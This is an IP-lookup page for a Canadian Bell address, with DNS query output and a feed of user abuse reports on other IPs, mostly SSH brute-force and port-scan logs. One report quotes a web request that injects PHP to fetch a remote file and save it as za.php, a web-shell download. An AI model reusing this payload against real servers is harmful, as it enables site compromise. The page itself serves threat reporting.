必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Canada

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.112.119.105
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 30463
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;142.112.119.105.		IN	A

;; AUTHORITY SECTION:
.			29	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025020301 1800 900 604800 86400

;; Query time: 19 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Feb 04 01:46:03 CST 2025
;; MSG SIZE  rcvd: 108
HOST信息:
105.119.112.142.in-addr.arpa domain name pointer ipagstaticip-b0ff6f92-623a-e63c-b3f5-d110255e061e.sdsl.bell.ca.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
105.119.112.142.in-addr.arpa	name = ipagstaticip-b0ff6f92-623a-e63c-b3f5-d110255e061e.sdsl.bell.ca.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
123.25.218.72 attack
Automatic report - Port Scan Attack
2020-02-29 00:55:41
46.101.184.111 attackspambots
Feb 26 16:01:57 lamijardin sshd[28359]: Did not receive identification string from 46.101.184.111
Feb 26 16:02:12 lamijardin sshd[28360]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.184.111  user=r.r
Feb 26 16:02:14 lamijardin sshd[28360]: Failed password for r.r from 46.101.184.111 port 45896 ssh2
Feb 26 16:02:14 lamijardin sshd[28360]: Received disconnect from 46.101.184.111 port 45896:11: Normal Shutdown, Thank you for playing [preauth]
Feb 26 16:02:14 lamijardin sshd[28360]: Disconnected from 46.101.184.111 port 45896 [preauth]
Feb 26 16:02:25 lamijardin sshd[28362]: Invalid user oracle from 46.101.184.111
Feb 26 16:02:25 lamijardin sshd[28362]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.184.111
Feb 26 16:02:28 lamijardin sshd[28362]: Failed password for invalid user oracle from 46.101.184.111 port 42176 ssh2
Feb 26 16:02:28 lamijardin sshd[28362]: Received disconn........
-------------------------------
2020-02-29 00:53:20
220.181.108.99 attack
Automatic report - Banned IP Access
2020-02-29 01:06:03
113.6.202.23 attackbotsspam
Port probing on unauthorized port 23
2020-02-29 00:36:40
189.134.220.183 attackspambots
Unauthorized connection attempt from IP address 189.134.220.183 on Port 445(SMB)
2020-02-29 00:43:51
180.241.45.182 attack
Unauthorized connection attempt from IP address 180.241.45.182 on Port 445(SMB)
2020-02-29 01:13:24
218.73.99.188 attackbots
GET /?a=fetch&templateFile=public/index&prefix=%27%27&content=%3C?php%20copy(%27http://www.xvidmate.com/upload/11.txt%27,%27za.php%27);
2020-02-29 01:00:16
187.144.124.26 attackspambots
suspicious action Fri, 28 Feb 2020 10:31:10 -0300
2020-02-29 00:39:56
222.186.169.192 attack
2020-02-28T10:07:41.132244homeassistant sshd[27502]: Failed password for root from 222.186.169.192 port 47886 ssh2
2020-02-28T17:08:35.964971homeassistant sshd[3516]: Failed none for root from 222.186.169.192 port 12936 ssh2
2020-02-28T17:08:36.214123homeassistant sshd[3516]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.169.192  user=root
...
2020-02-29 01:15:48
42.117.177.157 attackbotsspam
MultiHost/MultiPort Probe, Scan, Hack -
2020-02-29 00:38:28
59.120.178.249 attackbotsspam
SSH Bruteforce attempt
2020-02-29 00:42:24
185.176.27.18 attackbotsspam
ET DROP Dshield Block Listed Source group 1 - port: 42828 proto: TCP cat: Misc Attack
2020-02-29 01:00:51
128.199.81.66 attackbotsspam
firewall-block, port(s): 12047/tcp
2020-02-29 01:04:03
85.192.138.149 attackbots
Feb 28 17:02:26 v22019058497090703 sshd[6443]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.192.138.149
Feb 28 17:02:28 v22019058497090703 sshd[6443]: Failed password for invalid user hadoop from 85.192.138.149 port 35718 ssh2
...
2020-02-29 00:45:17
13.229.119.66 attackbotsspam
Total attacks: 2
2020-02-29 01:10:44

最近上报的IP列表

94.147.197.108 243.187.33.122 39.150.212.94 33.5.130.234
79.49.184.103 36.134.243.21 240.178.34.204 243.90.111.255
119.153.201.129 76.137.200.183 32.187.34.40 51.7.20.162
119.147.107.112 3.137.239.71 145.102.59.148 34.140.192.182
246.132.131.134 23.201.106.135 140.109.151.64 192.30.165.135